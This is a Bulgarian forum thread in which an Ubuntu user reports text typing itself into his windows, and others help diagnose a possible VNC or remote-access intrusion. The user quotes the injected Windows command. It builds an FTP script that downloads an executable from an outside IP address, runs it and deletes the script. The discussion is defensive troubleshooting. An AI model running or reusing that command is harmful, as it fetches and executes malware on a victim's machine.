Титла: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: chalgoman в May 31, 2012, 22:01
Здравейте.
Преди малко както си писах по скайп, компютъра започна да пише сам... помислих, че клавиатурата се е прецакала, но забелязах, че пише някакви windows-ки глупости (не успях да се усетя в началото и го изтрих... за това не е цялото):
\s y stem32\cmd.exe del eq&echo open 186.146.64.232 13072 >> eq&echo user 12794 11998 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq &ftp -n -s:eq &iexplorer.exe &del eq
Имате ли идея как може да е станало това и как да се справя с проблема (случи се 2 пъти през няколко минути)?
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: cybercop в May 31, 2012, 22:24
Само линукс ли е на този компютър ? Инсталирал ли си програми с wine? Не знам, дали е възможно да се инсталира вирус за windows под wine. Не, че ще те засегне, но би засегнал други потребители на windows с които кореспондираш.
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: vyrgozunqk в May 31, 2012, 22:53
Това не е вирус, а по-скоро някакъв скрипт и ако ползва скайп през виното, предполагам, че и скрипта ще работи.
Сега друг е въпроса защо ползва скайп през виното, но той си знае...
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: neter в May 31, 2012, 22:54
Не знам, дали е възможно да се инсталира вирус за windows под wine. Не, че ще те засегне, но би засегнал други потребители на windows с които кореспондираш.
Възможно е и е възможно да те засегне някак. Наблюдавано на личния ми компютър. Беше отдавна (някъде преди 4-5 години) и вече не пазя записките за разни подробности, които си бях записал, докато търсех на какво съм се натъкнал, но беше някакво червейче, така и не разбрах откъде точно го напипах, но си създаваше файлчета тук таме из домашната ми папка със същите имена като вече наличните файлове в папките, но с разширения .exe и .dll. Мина време оттогава, но се съмнявам, че тази уязвимост е прекъсната, така че продължавам да считам слагането на wine за най-последна възможност при наистина неотложни неща. И все пак, ако Skype-ът ти не е пуснат през wine, се съмнявам да е вирус, дошъл от приложенията в wine или инсталирания ти Windows (ако имаш такъв) - съмнявам се да имат пътечка, откъдето да си приказват директно с приложенията под Linux. По-скоро има вероятност някой да е мушнал в системата ти нещо, предвидено за Linux. Дай списък на процесите ти (ps ax) и виж crontab-овете на потребителите ти.
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: chalgoman в May 31, 2012, 23:39
Не съм казвал, че скайпа ми е инсталиран през wine - ползвам си нормалния скайп за линукс, и въобще не съм инсталирал wine... просто казах, че това се случи, докато писах по skype. Имах teamviewer инсталиран, а той ползва по някакъв начин wine (инсталира се с него някак... не знам как точно). Сега махнах teamviewer-a. Нямам и Windows, дори на този компютър никога не е инсталиран windows (само във virtualbox). А това се случи 2 пъти и толкова... от както писах не се е случвало, но не знам дали може пак да се случи, и дали не е възможно да ми следят инпут-а от клавиатурата, щом може да я управлява (който или каквото и да е). Имам само един крон, но него аз съм си го писал.. не е в него проблема. Ето процесите ми (прегледах ги, но не открих нещо съмнително, ако вие откриете, кажете): chalgoman@chalgoman:~$ ps ax
PID TTY STAT TIME COMMAND
1 ? Ss 0:01 /sbin/init
2 ? S 0:00 [kthreadd]
3 ? S 0:38 [ksoftirqd/0]
6 ? S 0:00 [migration/0]
7 ? S 0:01 [watchdog/0]
37 ? S< 0:00 [cpuset]
38 ? S< 0:00 [khelper]
39 ? S 0:00 [kdevtmpfs]
40 ? S< 0:00 [netns]
42 ? S 0:00 [sync_supers]
43 ? S 0:00 [bdi-default]
44 ? S< 0:00 [kintegrityd]
45 ? S< 0:00 [kblockd]
46 ? S< 0:00 [ata_sff]
47 ? S 0:00 [khubd]
48 ? S< 0:00 [md]
50 ? S 0:00 [khungtaskd]
51 ? S 0:00 [kswapd0]
52 ? SN 0:00 [ksmd]
53 ? SN 0:00 [khugepaged]
54 ? S 0:00 [fsnotify_mark]
55 ? S 0:00 [ecryptfs-kthrea]
56 ? S< 0:00 [crypto]
64 ? S< 0:00 [kthrotld]
67 ? S 0:00 [scsi_eh_0]
68 ? S 0:00 [scsi_eh_1]
69 ? S 0:00 [scsi_eh_2]
70 ? S 0:00 [scsi_eh_3]
71 ? S 0:00 [scsi_eh_4]
72 ? S 0:00 [scsi_eh_5]
99 ? S< 0:00 [devfreq_wq]
251 ? S 0:01 [jbd2/sda6-8]
252 ? S< 0:00 [ext4-dio-unwrit]
270 ? S 0:09 [flush-8:0]
334 ? S 0:00 upstart-udev-bridge --daemon
385 ? Ss 0:00 /sbin/udevd --daemon
572 ? S< 0:00 [kpsmoused]
748 ? S 0:00 upstart-socket-bridge --daemon
749 ? S< 0:00 [cfg80211]
753 ? S< 0:00 [iwlwifi]
787 ? S 0:00 [scsi_eh_6]
788 ? S 0:37 [rts5139-control]
790 ? S 25:12 [rts5139-polling]
861 ? S< 0:00 [led_workqueue]
862 ? S< 0:00 [ttm_swap]
870 ? S< 0:00 [hd-audio0]
883 ? S 0:09 [jbd2/sda5-8]
884 ? S< 0:00 [ext4-dio-unwrit]
914 ? Ss 0:00 /usr/sbin/sshd -D
925 ? Ss 0:36 dbus-daemon --system --fork --activation=upstart
930 ? Sl 0:21 rsyslogd -c5
944 ? Ss 0:00 /usr/sbin/modem-manager
946 ? Ss 0:00 /usr/sbin/bluetoothd
956 ? Ssl 0:23 NetworkManager
957 ? S< 0:00 [krfcommd]
960 ? S 0:00 avahi-daemon: running [chalgoman.local]
962 ? S 0:00 avahi-daemon: chroot helper
964 ? Sl 0:05 /usr/lib/policykit-1/polkitd --no-debug
1022 ? Ss 0:01 /usr/sbin/cupsd -F
1052 tty4 Ss+ 0:00 /sbin/getty -8 38400 tty4
1059 tty5 Ss+ 0:00 /sbin/getty -8 38400 tty5
1068 tty2 Ss+ 0:00 /sbin/getty -8 38400 tty2
1069 tty3 Ss+ 0:00 /sbin/getty -8 38400 tty3
1072 tty6 Ss+ 0:00 /sbin/getty -8 38400 tty6
1085 ? Ss 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
1088 ? Ss 0:00 cron
1090 ? Ss 0:00 atd
1094 ? Ssl 0:03 whoopsie
1096 ? Ss 1:24 /usr/sbin/irqbalance
1104 ? Ssl 1:33 /usr/sbin/mysqld
1121 ? Ss 0:09 /sbin/wpa_supplicant -B -P /run/sendsigs.omit.d/wpasu
1131 ? S< 0:00 [iprt]
1140 ? Ssl 0:00 lightdm
1175 tty7 Ss+ 402:31 /usr/bin/X :0 -auth /var/run/lightdm/root/:0 -noliste
1204 ? Sl 0:00 lightdm --session-child 12 15
1207 ? Sl 0:06 /usr/lib/accountsservice/accounts-daemon
1242 ? Ss 0:02 proftpd: (accepting connections)
1288 ? Ss 0:13 /usr/sbin/apache2 -k start
1298 ? S 0:00 /usr/sbin/apache2 -k start
1302 ? S 0:00 /usr/sbin/apache2 -k start
1303 ? S 0:00 /usr/sbin/apache2 -k start
1428 ? Sl 0:01 /usr/sbin/console-kit-daemon --no-daemon
1502 tty1 Ss+ 0:00 /sbin/getty -8 38400 tty1
1517 ? Ssl 0:02 gnome-session --session=ubuntu
1553 ? Ss 0:01 /usr/bin/ssh-agent /usr/bin/dbus-launch --exit-with-s
1556 ? S 0:00 /usr/bin/dbus-launch --exit-with-session gnome-sessio
1557 ? Ss 3:27 //bin/dbus-daemon --fork --print-pid 5 --print-addres
1566 ? Sl 1:36 /usr/lib/gnome-settings-daemon/gnome-settings-daemon
1568 ? SLl 0:00 /usr/bin/gnome-keyring-daemon --start --components=se
1577 ? Sl 0:27 /usr/lib/upower/upowerd
1774 ? S 0:00 /usr/lib/gvfs/gvfsd
1776 ? Sl 0:00 /usr/lib/gvfs//gvfs-fuse-daemon -f /home/chalgoman/.g
1793 ? Sl 292:07 compiz
1795 ? Sl 0:00 /usr/lib/x86_64-linux-gnu/colord/colord
1804 ? S 0:00 /usr/lib/x86_64-linux-gnu/gconf/gconfd-2
1846 ? S 2:42 syndaemon -i 2.0 -K -R -t
1851 ? S<l 67:48 /usr/bin/pulseaudio --start --log-target=syslog
1853 ? SNl 0:03 /usr/lib/rtkit/rtkit-daemon
1921 ? S 0:00 /usr/lib/pulseaudio/pulse/gconf-helper
1934 ? Sl 0:04 /usr/lib/vino/vino-server --sm-disable
1935 ? Sl 0:01 /usr/lib/gnome-settings-daemon/gnome-fallback-mount-h
1936 ? Sl 0:00 bluetooth-applet
1937 ? Sl 0:00 /usr/lib/policykit-1-gnome/polkit-gnome-authenticatio
1939 ? Sl 0:23 nm-applet
1940 ? Sl 1:26 nautilus -n
1942 ? Sl 5:45 alarm-clock-applet --hidden
1960 ? S 0:00 /usr/lib/gvfs/gvfs-gdu-volume-monitor
1965 ? Sl 0:10 /usr/lib/telepathy/mission-control-5
1968 ? Sl 0:05 /usr/lib/udisks/udisks-daemon
1971 ? S 0:00 udisks-daemon: not polling any devices
1974 ? Sl 0:00 /usr/lib/gnome-online-accounts/goa-daemon
1979 ? Sl 0:19 /usr/lib/gvfs/gvfs-afc-volume-monitor
1982 ? S 0:00 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
1986 ? S 0:00 /usr/lib/gvfs/gvfsd-trash --spawner :1.9 /org/gtk/gvf
1993 ? Sl 0:38 /usr/lib/bamf/bamfdaemon
1997 ? Ss 0:00 /bin/sh -c /usr/bin/compiz-decorator
1998 ? Sl 1:03 /usr/bin/gtk-window-decorator
2007 ? S 0:00 /usr/lib/gvfs/gvfsd-metadata
2011 ? Sl 1:39 /usr/lib/unity/unity-panel-service
2013 ? Sl 0:39 /usr/lib/indicator-appmenu/hud-service
2022 ? S 0:00 /usr/lib/gvfs/gvfsd-burn --spawner :1.9 /org/gtk/gvfs
2025 ? Sl 0:00 /usr/lib/indicator-messages/indicator-messages-servic
2027 ? Sl 0:00 /usr/lib/indicator-datetime/indicator-datetime-servic
2029 ? Sl 3:24 /usr/lib/indicator-application/indicator-application-
2031 ? Sl 0:01 /usr/lib/indicator-session/indicator-session-service
2035 ? Sl 0:02 /usr/lib/indicator-sound/indicator-sound-service
2038 ? Sl 0:00 /usr/lib/indicator-printers/indicator-printers-servic
2060 ? S 0:00 /usr/lib/geoclue/geoclue-master
2070 ? S 0:03 /usr/lib/ubuntu-geoip/ubuntu-geoip-provider
2091 ? Sl 0:09 /usr/lib/unity-lens-applications/unity-applications-d
2093 ? Sl 0:01 /usr/lib/unity-lens-files/unity-files-daemon
2095 ? Sl 0:01 /usr/lib/unity-lens-music/unity-music-daemon
2097 ? Sl 0:02 /usr/bin/python /usr/lib/unity-lens-video/unity-lens-
2122 ? Sl 0:02 /usr/bin/zeitgeist-daemon
2129 ? Sl 0:02 /usr/lib/zeitgeist/zeitgeist-fts
2131 ? Sl 0:02 zeitgeist-datahub
2137 ? S 0:00 /bin/cat
2158 ? Sl 0:00 /usr/lib/at-spi2-core/at-spi-bus-launcher
2220 ? Sl 0:30 /usr/bin/python /usr/lib/unity-scope-video-remote/uni
2222 ? Sl 0:00 /usr/lib/unity-lens-music/unity-musicstore-daemon
2239 ? Sl 0:25 /usr/lib/glib-networking/glib-pacrunner
2254 ? Sl 0:01 /usr/lib/gnome-disk-utility/gdu-notification-daemon
2276 ? Sl 0:00 telepathy-indicator
2290 ? Sl 0:28 gnome-screensaver
2331 ? Sl 0:07 /usr/bin/python /usr/lib/ubuntuone-client/ubuntuone-s
2378 ? Sl 0:11 update-notifier
2403 ? S 0:00 /usr/bin/python /usr/lib/system-service/system-servic
2412 ? Sl 76:00 skype
2461 ? Sl 0:01 /usr/lib/deja-dup/deja-dup/deja-dup-monitor
4729 ? S 0:09 [kworker/4:2]
5899 ? Sl 0:06 /usr/lib/notify-osd/notify-osd
5913 ? S 0:00 /usr/sbin/apache2 -k start
6076 ? Sl 0:00 /usr/lib/gvfs/gvfsd-http --spawner :1.9 /org/gtk/gvfs
6352 ? Sl 0:00 /usr/lib/dconf/dconf-service
6400 ? S 0:00 /usr/lib/cups/notifier/dbus dbus://
8302 ? S 0:32 [kworker/2:0]
8560 ? S 0:00 [kworker/2:1]
9189 ? S 0:06 [kworker/5:2]
10986 ? S 0:00 [kworker/1:0]
11484 ? S 0:00 [kworker/u:2]
12375 ? S 0:00 [migration/1]
12377 ? S 0:09 [ksoftirqd/1]
12378 ? S 0:01 [watchdog/1]
12379 ? S 0:00 [migration/2]
12381 ? S 0:07 [ksoftirqd/2]
12382 ? S 0:01 [watchdog/2]
12383 ? S 0:00 [migration/3]
12385 ? S 0:25 [ksoftirqd/3]
12386 ? S 0:01 [watchdog/3]
12387 ? S 0:00 [migration/4]
12389 ? S 0:01 [ksoftirqd/4]
12390 ? S 0:01 [watchdog/4]
12391 ? S 0:02 [migration/5]
12393 ? S 0:00 [ksoftirqd/5]
12394 ? S 0:01 [watchdog/5]
12395 ? S 0:00 [migration/6]
12397 ? S 0:01 [ksoftirqd/6]
12398 ? S 0:01 [watchdog/6]
12399 ? S 0:00 [migration/7]
12401 ? S 0:01 [ksoftirqd/7]
12402 ? S 0:01 [watchdog/7]
12403 ? S 0:00 [irq/51-mei]
12458 ? S 0:49 [kworker/7:0]
12791 ? S 0:49 [kworker/6:1]
12952 ? S 1:31 /sbin/dhclient -d -4 -sf /usr/lib/NetworkManager/nm-d
12955 ? S 0:05 /usr/sbin/dnsmasq --no-resolv --keep-in-foreground --
13031 ? Rl 760:58 /usr/lib/firefox/firefox
13215 ? Sl 0:20 /usr/lib/firefox/plugin-container /usr/lib/mozilla/pl
13704 ? S 0:00 [kworker/u:1]
13725 ? Sl 0:18 filezilla
13823 ? S 0:00 /usr/bin/fzsftp -v
13839 ? Sl 0:17 /usr/bin/gedit /tmp/fz3temp-1/scrabble_word_importer.
13950 ? S 0:00 /sbin/udevd --daemon
13951 ? S 0:00 /sbin/udevd --daemon
14625 ? S 0:00 [kworker/5:1]
14628 ? Sl 33:18 /usr/lib/firefox/plugin-container /usr/lib/flashplugi
14904 ? S 3:21 [kworker/1:1]
15222 ? S 0:01 [kworker/3:2]
15648 ? S 0:00 [kworker/4:1]
15676 ? S 0:00 [kworker/0:2]
15810 ? S 0:00 [kworker/0:0]
15838 ? S 0:00 [kworker/3:1]
15839 ? S 0:00 [kworker/3:3]
15932 ? S 0:00 [kworker/0:1]
15972 ? Sl 0:00 gnome-terminal
15978 ? S 0:00 gnome-pty-helper
15979 pts/2 Ss 0:00 bash
16037 pts/2 R+ 0:00 ps ax
19194 ? S 0:00 [kworker/6:2]
19226 ? Sl 0:00 /usr/lib/firefox/plugin-container /usr/lib/mozilla/pl
19723 ? S 0:00 /usr/sbin/apache2 -k start
19794 ? S 0:00 /usr/sbin/apache2 -k start
28910 ? Sl 220:05 transmission-gtk /tmp/Project.X.2012.DVDRip.XviD-AMIA
29147 ? S 0:00 [kworker/7:1]
32615 ? S 0:00 /usr/sbin/apache2 -k start
32618 ? S 0:00 /usr/sbin/apache2 -k start
32620 ? S 0:00 /usr/sbin/apache2 -k start
32621 ? S 0:00 /usr/sbin/apache2 -k start
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: neter в Jun 01, 2012, 00:45
Ако изключим дълбоко спорния въпрос дупка в сигурността ли е Skype, и ако да, каква (има такава вероятност, но проверката на този случай едва ли ще ни доведе до някъде), можем да се ограничим до 3 варианта:
- Въпросният teamviewer. Одеве изпуснах тази възможност приложение за Windows да предостави достъп до Linux приложенията. Ако някой е напипал данните ти за достъп до твоята машина, работата е ясна. Ако ти е бил пуснат и онзи е минал по стандартния път за влизане през teamviewer, си щял да видиш, че се случва, но като всяко Windows приложение кой знае какво управление може да позволи. Ако е било от него, след като си го премахнал, си се закърпил;
- Някой да е влязъл през SSH. Динамичните версии на Skype имат D-Bus API, на което не съм подробно запознат с възможностите, но щом Pidgin може да праща Skype съобщения през него, току виж да има възможност и за писане по прозореца. Провери кой е влизал през SSH с "last | less";
- Някой от процесите ти да не е това, за което се представя с името си и да се окаже конче. Трябва да дръпнеш една стабилна проверка на изписаните в процесите файлове дали са това, което очакваш. Може да започнеш с
а) /usr/sbin/mysqld
Не съм виждал инсталиран от прекомпилиран пакет MySQL да се стартира без параметри, освен ако специално не си си поиграл това да е така;
б) //bin/dbus-daemon
Какво правят тия две наклонени черти отпред? Странно;
в) /usr/lib/gvfs//gvfs-fuse-daemon
Същата странност като в б)
П.П.: Какво точно правят тези Zeitgeist процеси? Не знаех за този пакет. Гледам, че е свързано нещо с движението, та ми стана интересно :)
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: chalgoman в Jun 01, 2012, 01:20
Никой освен мен не е влизал през ssh, проверих както каза.
А иначе за това, че може да пише по прозореца.. то не пишеше само в скайп прозореца, ами на всякъде, където кликна и може да се пише... просто споменах, че в него момент писах в скайп, но когато смених прозореца, започна да ми пише в текстовия редактор, смених от него на браузъра, и когато кликнах в адреса, започна да пише там. Както и да е :)
Относно процесите - mysql-а е ок, работи си, значи не е фалшив процес с неговото име.
Тези с 2-те наклонени черти - идея си нямам защо са така.. ще се поразтърся утре, че сега заспивам направо :D
А този Zeitgeist - никаква идея какво е, одеве проверих само, че по принцип има такъв пакет и не съм търсил подробности.. аз мислех, че си е със убунту-то, не съм инсталвал подобно нещо :)
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: n00b в Jun 01, 2012, 01:46
пуу - че няма никой на онова ИП
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: neter в Jun 01, 2012, 01:49
Всъщност, въпросният Zeitgeist не е свързан с движението, не знам какво съм видял одеве. Това ($2) е началната страница на проекта, има връзки и към подчастите му. Интересна идея, макар че още не съм сигурен дали ми се вижда хубава или лоша. Сигурно предоставя голямо удобство, ама цялото това прехвърляне на данни (някои от които може да се окажат конфиденциални) между приложенията... не ми вдъхва много доверие. Текущият ти проблем едва ли е свързан с Zeitgeist-а, но тази система има нужда от стабилно разучаване :)
Като каза, че според логовете само ти си влизал през SSH, надявам се си гледал и IP-тата, а не само потребителското име.
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: runtime в Jun 01, 2012, 10:04
http://www.google.bg/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CD0QFjAB&url=http%3A%2F%2Fwww.experts-exchange.com%2FSecurity%2FVulnerabilities%2FQ_26862869.html&ei=b2jIT52MLs_ltQbhrY2ADw&usg=AFQjCNHh5bBtWUKZ8J8RzeJ8iLMpADMLxg&sig2=DujGupRqUOJl61-daET5lg
На този линк (горния) минавам през кеша на гугъл иначе не могат да се четат темите
http://www.pcreview.co.uk/forums/pc-typed-itself-systemroot-system32-cmd-exe-del-eq-and-echo-open-t3294703.html
И на двете места се споменава за VNC, и някаква вратичка в него. По-скоро го разкарай и виж за какво става дума после.
Я виж какво ще ти върне lsof -i когато вземе да си пише по скайп :)
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: neter в Jun 01, 2012, 10:10
А, има Vino в списъка с процеси, добра насока от runtime :)
Титла: Re: Windows-ки вирус в Ubuntu 12.04?
Публикувано от: chalgoman в Jun 01, 2012, 15:09
neter, разбира се, че гледах IP-тата... то е само от работата..
Относно VNC-то - махнах Vino-то, да видим.. но там е работата, че от както се случи вчера, повече не е ставало така.
Благодаря на всички за помощта :)
|